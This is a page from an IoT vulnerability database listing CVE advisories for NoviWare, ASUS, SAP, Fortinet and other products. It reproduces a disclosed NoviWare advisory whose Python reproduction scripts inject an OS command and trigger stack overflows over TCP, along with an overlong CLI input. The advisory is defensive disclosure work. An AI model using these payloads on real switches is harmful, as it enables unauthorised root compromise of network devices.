VARIoT IoT vulnerabilities database


VAR-201708-1147 CVE-2017-12787 NoviWare Buffer error vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow. NoviWare contains a buffer error vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). NoviFlow NoviWare and NoviSwitch devices are products of NoviFlow (Canada). NoviSwitch devices are a series of switch devices, and NoviWare is the switch software that runs on them. NoviFlow NoviWare NW400.2.6 and previous versions, and NoviSwitch devices running them, have a security vulnerability in the network interface of novi_process_manager_daemon. A remote attacker could exploit the vulnerability to execute code with root privileges.

NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities

Introduction
============
NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices.

CVEs
====
* CVE-2017-12784: remote code execution in novi_process_manager_daemon
  Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
* CVE-2017-12785: cli breakout in novish
  Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
* CVE-2017-12786: remote code execution in noviengine and cliengine
  Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

Affected versions
=================
NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed

Author
======
François Goichon - Google Security Team

CVE-2017-12784
==============
Remote code execution in novi_process_manager_daemon

Summary
-------
The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device.
- A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service
- This network service is prone to command injection and a stack-based buffer overflow

Reproduction
------------
If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions:
---
from struct import pack
import socket
s = socket.socket()
s.connect((<switch host>, 2020))
payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00"
s.sendall(pack("<II", 1, len(payload)+8))
s.sendall(payload)
s.close()
---
On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs.

Remediation
-----------
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

CVE-2017-12785
==============
Cli breakout in novish

Summary
-------
The NoviWare switching software distribution is prone to a buffer overflow and a command injection, allowing authenticated, low-privileged users to break out of the CLI and execute commands as root.

Reproduction
------------
Log in to the appliance via SSH and run the following command from the CLI:
--
noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--
If the appliance is vulnerable, the cli crashes and the session ends.

Remediation
-----------
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

CVE-2017-12786
==============
Remote code execution in noviengine and cliengine

Summary
-------
- A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services
- These network services are prone to a stack-based buffer overflow when unpacking serialized values.

Reproduction
------------
If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions:
---
from struct import pack
import socket
s = socket.socket()
s.connect((<switch host>, <9090 or 12345>))
payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)])
payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload
s.sendall(payload)
s.read(1)
s.close()
---
A watchdog should restart the service if it has crashed.

Remediation
-----------
- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

Disclosure timeline
===================
2017/05/11 - Report sent to NoviFlow
2017/05/26 - Bugs acknowledged and remediation timeline confirmed
2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities
2017/08/09 - CVE requests
2017/08/16 - Public disclosure
VAR-201708-1145 CVE-2017-12785 NoviWare Buffer error vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the "show log cli" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection. NoviWare contains a buffer error vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). The referenced advisory, "NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities" (François Goichon, Google Security Team), is reproduced in full under VAR-201708-1147 above.
VAR-201708-1427 CVE-2017-9556 Synology Video Station Vulnerable to cross-site scripting CVSS V2: 3.5
CVSS V3: 5.4
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in Video Metadata Editor in Synology Video Station before 2.3.0-1435 allows remote authenticated attackers to inject arbitrary web script or HTML via the title parameter. Synology Video Station contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. Synology Video Station is a video manager from Synology; Video Metadata Editor is one of its components for editing video metadata.
VAR-201708-1647 No CVE D-Link DIR Series Router Authentication Information Disclosure Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The DIR series is a series of cloud router products from D-Link. D-Link DIR series routers have a remote information disclosure vulnerability: a global variable is set when an administrator logs in to the device, and an attacker can use that global variable to bypass security checks and read arbitrary files, obtaining sensitive information such as administrator account passwords.
VAR-201708-1646 No CVE D-Link DIR Series Router Remote Command Execution Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
The DIR series is a series of cloud router products from D-Link. A remote command execution vulnerability exists in D-Link DIR series routers. An attacker can obtain the router's management (backend) login credentials and execute arbitrary code through the router's public-network portal.
VAR-201708-0549 CVE-2017-3756 plural Lenovo ThinkPad Vulnerabilities related to authorization, authority, and access control in products CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
A privilege escalation vulnerability was identified in Lenovo Active Protection System for ThinkPad systems versions earlier than 1.82.0.17. An attacker with local privileges could execute code with administrative privileges via an unquoted service path. Multiple Lenovo ThinkPad products contain vulnerabilities related to authorization, permissions, and access control. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Lenovo Active Protection System is prone to a local privilege-escalation vulnerability. Lenovo ThinkPad for Windows is a Windows-based portable computer from Lenovo (China). Active Protection System is an autonomous feature designed to protect hard drives from damage caused by strong physical shocks and vibrations.
VAR-201708-0959 CVE-2017-5694 Intel Solid-State Drive Professional Data processing vulnerability in some firmware CVSS V2: 4.9
CVSS V3: 4.6
Severity: MEDIUM
Data corruption vulnerability in firmware in Intel Solid-State Drive Professional PSF104P, PSF109P allows local users to cause a denial of service via unspecified vectors. Intel Solid-State Drive Professional is a solid state drive from Intel Corporation of the United States. There is a security vulnerability in the firmware in the Intel Solid-State Drive Professional PSF104P and PSF109P versions.
VAR-201708-0960 CVE-2017-5695 plural Intel Input validation vulnerability in firmware CVSS V2: 2.1
CVSS V3: 4.6
Severity: MEDIUM
Data corruption vulnerability in firmware in Intel Solid-State Drive Consumer, Professional, Embedded, Data Center affected firmware versions LSBG200, LSF031C, LSF036C, LBF010C, LSBG100, LSF031C, LSF036C, LBF010C, LSF031P, LSF036P, LBF010P, LSF031P, LSF036P, LBF010P, LSMG200, LSF031E, LSF036E, LSMG100, LSF031E, LSF036E, LSDG200, LSF031D, LSF036D allows local users to cause a denial of service via unspecified vectors. The firmware of multiple Intel products contains an input validation vulnerability, which may result in a denial of service (DoS). Intel SSD 540s Series and others are different series of SSD products from Intel Corporation of the United States. There are security vulnerabilities in several Intel products.
VAR-201708-1179 CVE-2017-12754 plural ASUS For devices Asuswrt-Merlin Firmware and ASUS Firmware buffer error vulnerability CVSS V2: 6.5
CVSS V3: 8.8
Severity: HIGH
Stack buffer overflow in httpd in Asuswrt-Merlin firmware 380.67_0RT-AC5300 and earlier for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by sending a crafted http GET request packet that includes a long delete_offline_client parameter in the url. Asuswrt-Merlin firmware and ASUS firmware for multiple ASUS devices contain a buffer error vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). ASUS RT-AC5300 and others are wireless routers from ASUS. ASUS Asuswrt-Merlin is the firmware running on them, and httpd is its embedded HTTP server. A stack buffer overflow vulnerability exists in httpd in Asuswrt-Merlin 380.67_0RT-AC5300 and previous versions on several ASUS products.
VAR-201801-0231 CVE-2017-5170 Moxa SoftNVR-IA Live Viewer DLL Local arbitrary code execution vulnerability CVSS V2: 6.5
CVSS V3: 7.2
Severity: HIGH
An Uncontrolled Search Path Element issue was discovered in Moxa SoftNVR-IA Live Viewer, Version 3.30.3122 and prior versions. An uncontrolled search path element (DLL Hijacking) vulnerability has been identified. To exploit this vulnerability, an attacker could rename a malicious DLL to meet the criteria of the application, and the application would not verify that the DLL is correct. The attacker needs to have administrative access to the default install location in order to plant the insecure DLL. Once loaded by the application, the DLL could run malicious code at the privilege level of the application. Moxa SoftNVR-IA Live Viewer is video surveillance software developed by Moxa for industrial automation systems. A local arbitrary code execution vulnerability via DLL loading exists in Moxa SoftNVR-IA Live Viewer 3.30.3122 and earlier. This vulnerability stems from the program failing to properly filter user-submitted input.
VAR-201708-1674 No CVE SAP NetWeaver Unspecified SQL Injection Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
SAP NetWeaver is prone to an unspecified SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
VAR-201708-1677 No CVE SAP NetWeaver Business Unspecified Cross Site Scripting Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
VAR-201708-1668 No CVE SAP NetWeaver K.M. Web Page Composer URI Redirection Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
SAP NetWeaver is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
VAR-201708-0364 CVE-2017-10811 WCR-1166DS vulnerable to OS command injection CVSS V2: 7.7
CVSS V3: 6.8
Severity: MEDIUM
Buffalo WCR-1166DS devices with firmware 1.30 and earlier allow an attacker to execute arbitrary OS commands via unspecified vectors. WCR-1166DS provided by BUFFALO INC. is a wireless LAN router. WCR-1166DS contains an OS command injection vulnerability (CWE-78). Masashi Shiraishi of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. A user who can access the administrative console of the device may execute an arbitrary OS command. Buffalo WCR-1166DS with firmware version 1.30 and earlier has a security vulnerability.
VAR-201708-0802 CVE-2017-2289 Installer of Qua station connection tool for Windows may insecurely load Dynamic Link Libraries CVSS V2: 9.3
CVSS V3: 7.8
Severity: HIGH
Untrusted search path vulnerability in Installer of Qua station connection tool for Windows version 1.00.03 allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. Qua station, provided by KDDI CORPORATION, is a 4G LTE photo storage device. Qua station connection tool is used to view data saved on Qua station from a PC and/or save data on a PC. Eili Masami of Tachibana Lab. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. Arbitrary code may be executed with the privilege of the user invoking the installer. A remote attacker can exploit this vulnerability to gain privileges by means of a malicious DLL placed in the directory.
VAR-201708-1661 No CVE SAP NetWeaver Visual Composer Remote Code Injection Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
SAP NetWeaver Visual Composer is prone to a vulnerability that lets attackers inject and execute arbitrary code. Successful exploits may allow an attacker to inject and run arbitrary code or obtain sensitive information that may aid in further attacks. Failed exploit attempts may result in a denial-of-service condition.
VAR-201708-1653 No CVE SAP SRM Multiple Unspecified Security Vulnerabilities CVSS V2: -
CVSS V3: -
Severity: -
SAP SRM is prone to multiple unspecified security vulnerabilities. Little is known about this issue or its effects at this time. We will update this BID as more information emerges.
VAR-201708-1657 No CVE SAP NetWeaver Logon Application URI Redirection Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
SAP NetWeaver is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
VAR-201708-1511 CVE-2017-7737 Fortinet FortiWeb Vulnerable to information disclosure CVSS V2: 4.0
CVSS V3: 4.9
Severity: MEDIUM
An information disclosure vulnerability in Fortinet FortiWeb 5.8.2 and below versions allows a logged-in admin user to view the SNMPv3 user password in cleartext in the web UI via the HTML source code. Fortinet FortiWeb contains an information disclosure vulnerability. Information may be obtained. Fortinet FortiWeb is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. Fortinet FortiWeb 5.8.2 and prior versions are vulnerable. Fortinet FortiWeb is a web application layer firewall developed by Fortinet, which can block threats such as cross-site scripting, SQL injection, cookie poisoning, schema poisoning, etc., to ensure the security of web applications and protect sensitive database content.
VAR-201708-0474 CVE-2017-3130 Fortinet FortiOS Vulnerable to information disclosure CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
An information disclosure vulnerability in Fortinet FortiOS 5.6.0, 5.4.4 and below versions allows an attacker to get FortiOS version info by inspecting FortiOS IKE VendorID packets. Fortinet FortiOS contains an information disclosure vulnerability. Information may be obtained. Fortinet FortiOS is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. Fortinet FortiOS 5.0.0 through 5.4.4 and 5.6.0 are vulnerable. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam.